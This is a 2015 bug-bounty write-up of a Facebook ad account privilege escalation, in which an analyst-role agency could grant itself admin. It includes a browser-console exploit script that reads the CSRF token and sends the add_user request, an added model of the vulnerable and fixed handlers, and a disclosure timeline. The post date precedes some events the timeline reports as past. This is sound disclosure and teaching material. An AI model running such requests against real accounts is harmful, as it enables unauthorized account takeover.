Sunday, March 15, 2015

Bypass ad account roles vulnerability 2015



facebook exploit 2015





I discovered a vulnerability in Facebook that allowed a user holding a non-admin role in an ad account to gain unauthorized admin access to that ad account.

Admins of an ad account can add any user to the account with one of these three roles:

  1. admin
  2. advertiser
  3. analyst

Facebook's help documentation describes what each of these roles is allowed to do.

Facebook launched Business Manager in 2014 to help businesses and agencies manage their Facebook Pages and ad accounts; it is reachable at business.facebook.com.

In Business Manager, a business account can assign agencies to its own ad accounts. The agency then gets limited access to those ad accounts (the owner chooses the access level during the assign-agency process).

The vulnerability I found allowed an agency holding one of the non-admin roles (advertiser or analyst, roles 2 and 3 above) to change its own access to admin.

Scenario:

I have a business account, and I give analyst permission on my ad account to another business account.
That business account can bypass the role restriction and obtain admin access to my ad account.



Details:

With analyst permission on any ad account, send this request:

request URL: facebook.com/ads/manage/settings/permissions/?action=add_user

request body:

act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission: 1001 admin, 1002 advertiser, 1003 analyst]

The endpoint did not verify that the requester's own role in the ad account was admin, so an analyst could grant any permission, including admin, to any user, themselves included.

Exploit (run from the browser console while logged in as the analyst user):

var Xhr = new XMLHttpRequest();
Xhr.open("POST", "/ads/manage/settings/permissions/?action=add_user", true);
// the endpoint expects a URL-encoded form body
Xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
// fb_dtsg is Facebook's CSRF token; it is read from the hidden form field of the current session
p += "&fb_dtsg=" + encodeURIComponent(document.getElementsByName("fb_dtsg")[0].value);
Xhr.send(p);

__ACCID__ = ad account id
__USERID__ = this user will be the new admin ;)
__PERM__ = permission (1001, 1002, 1003)
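To make the missing check concrete, here is an added example (my own model, not Facebook's code) of the server side of the add_user endpoint: a vulnerable handler that only checks the requester has some role in the ad account, beside a fixed handler that requires the admin role. The permission codes are the ones from the post; the account id, user ids and the in-memory "database" are constructed for the example.

```javascript
// Added example, not Facebook's code: a model of the server side of
// /ads/manage/settings/permissions/?action=add_user, showing the missing
// authorization check beside its fix. Ids and state are constructed.

const PERM = { ADMIN: 1001, ADVERTISER: 1002, ANALYST: 1003 };
const VALID_PERMS = new Set(Object.values(PERM));

// Constructed sample state: ad account "123" owned by user "owner" (admin),
// with an agency user "agency_analyst" delegated the analyst role.
function makeDb() {
  return new Map([
    ["123", { roles: new Map([["owner", PERM.ADMIN], ["agency_analyst", PERM.ANALYST]]) }],
  ]);
}

// Vulnerable handler: accepts any requester who has *some* role in the
// account named by `act`, so an analyst can grant admin to anyone,
// including themselves.
function addUserVulnerable(db, requester, body) {
  const account = db.get(body.act);
  if (!account) return { ok: false, error: "no such account" };
  if (!account.roles.has(requester)) return { ok: false, error: "forbidden" };
  if (!VALID_PERMS.has(body.add_user_permission)) return { ok: false, error: "bad permission" };
  account.roles.set(body.user_id, body.add_user_permission);
  return { ok: true };
}

// Fixed handler: the requester's role is looked up in the account the
// request targets, and membership changes require that role to be admin.
function addUserFixed(db, requester, body) {
  const account = db.get(body.act);
  if (!account) return { ok: false, error: "no such account" };
  if (account.roles.get(requester) !== PERM.ADMIN) return { ok: false, error: "forbidden" };
  if (!VALID_PERMS.has(body.add_user_permission)) return { ok: false, error: "bad permission" };
  account.roles.set(body.user_id, body.add_user_permission);
  return { ok: true };
}

// Replays the post's exploit request (the analyst making themselves admin)
// against a handler and reports the analyst's role afterwards.
function runExploit(handler) {
  const db = makeDb();
  const exploitBody = { act: "123", user_id: "agency_analyst", add_user_permission: PERM.ADMIN };
  const result = handler(db, "agency_analyst", exploitBody);
  return { accepted: result.ok, roleAfter: db.get("123").roles.get("agency_analyst") };
}

// The legitimate path, which must keep working after the fix: the owner
// adds a new advertiser.
function runOwnerAdd(handler) {
  const db = makeDb();
  const body = { act: "123", user_id: "new_advertiser", add_user_permission: PERM.ADVERTISER };
  const result = handler(db, "owner", body);
  return { accepted: result.ok, roleAfter: db.get("123").roles.get("new_advertiser") };
}

console.log("vulnerable:", runExploit(addUserVulnerable)); // accepted: true, roleAfter: 1001
console.log("fixed:", runExploit(addUserFixed));           // accepted: false, roleAfter: 1003
console.log("owner add (fixed):", runOwnerAdd(addUserFixed)); // accepted: true, roleAfter: 1002
```

The point of the fixed handler is that the authorization decision is made against the role the requester holds in the specific account named in the request, not against the mere fact that the requester is a member of it; a delegated analyst or advertiser then cannot escalate, while the owner's own administration is unaffected.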

POC:

(I removed the sections of the screenshots that showed a user id or email address.)





Timeline:

  •  Mar 14, 2015 01:27am: Initial report
  •  Mar 17, 2015 03:35am: Bug acknowledged by the security team
  •  Mar 17, 2015 08:00am: Security team member Reginaldo informed me that the vulnerability was fixed
  •  Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with $8,000



